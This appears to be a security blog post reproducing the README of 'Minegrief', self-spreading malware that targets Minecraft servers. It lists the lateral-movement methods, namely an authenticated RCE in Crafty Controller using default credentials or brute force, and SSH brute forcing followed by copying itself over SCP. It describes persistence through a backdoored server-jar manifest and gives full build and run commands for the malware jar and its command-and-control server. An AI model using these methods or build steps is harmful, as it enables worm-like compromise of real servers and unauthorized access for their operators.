Malware

Minegrief : Unpacking A Crafty Minecraft Malware

Self-spreading to other Minecraft servers using an extendable, module-based lateral movement system.

  • Crafty Controller Auth’d RCE – undisclosed, unpatched, intentional(?) Auth’d RCE in Crafty Controller, a panel for Minecraft server management. Check for default creds of admin:crafty or brute force.
  • SSH brute forcing – Classic SSH brute forcing, Minegrief will copy itself over SCP and execute itself if a login is successful

Persistence/stealth by “infecting” the Minecraft server jar file via manifest entry point modification

Notes

Lateral movement modules require minegriefagent to be built as a jar file, as modules will copy itself over in a jar to spread.

To Build The Agent Jarfile

Download jsch to the root directory of the repository

wget https://repo1.maven.org/maven2/com/github/mwiede/jsch/0.2.17/jsch-0.2.17.jar
unzip jsch-0.2.17.jar

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find agent -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
cp -r com/jcraft build-manual/com
echo 'Manifest-Version: 1.0\nMain-Class: net.minecraft.bundler.Backdoor\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm malware.jar manifest.txt -C build-manual .

Run it

<JAVA 1.8 DIR>/bin/java -jar malware.jar

To Build The Server Jarfile

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find server -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
echo 'Manifest-Version: 1.0\nMain-Class: com.chebuya.minegriefserver.Main\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm c2-server.jar manifest.txt -C build-manual .
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Set Up Nginx Server Blocks on Ubuntu 18.04: Host Multiple Sites

Nginx server blocks let you run more than one website on a single server. Each block…

2 hours ago

Install Tor Browser on Ubuntu 18.04: Anonymous Browsing Guide

Tor Browser is a modified version of Firefox that routes all your web traffic through the Tor…

2 hours ago

Install Vagrant on Ubuntu 18.04: Complete Setup Guide for Developers

Vagrant is a command-line tool that makes it easy to build and manage virtual machine environments.…

4 hours ago

Install VMware Tools on Ubuntu 18.04: Open VM Tools and ISO Guide

VMware Tools is a set of drivers and services that improves the performance of an Ubuntu…

4 hours ago

Install Apache Maven on Ubuntu 18.04: Stable or Latest Version

Java developers use project management tools to automate building their applications. Apache Maven is an open source…

4 hours ago

Install Mono on Ubuntu 18.04: C# Compiler and Runtime Guide

Running programs built for Microsoft's framework on a Linux system is easier than you think. Mono is…

1 day ago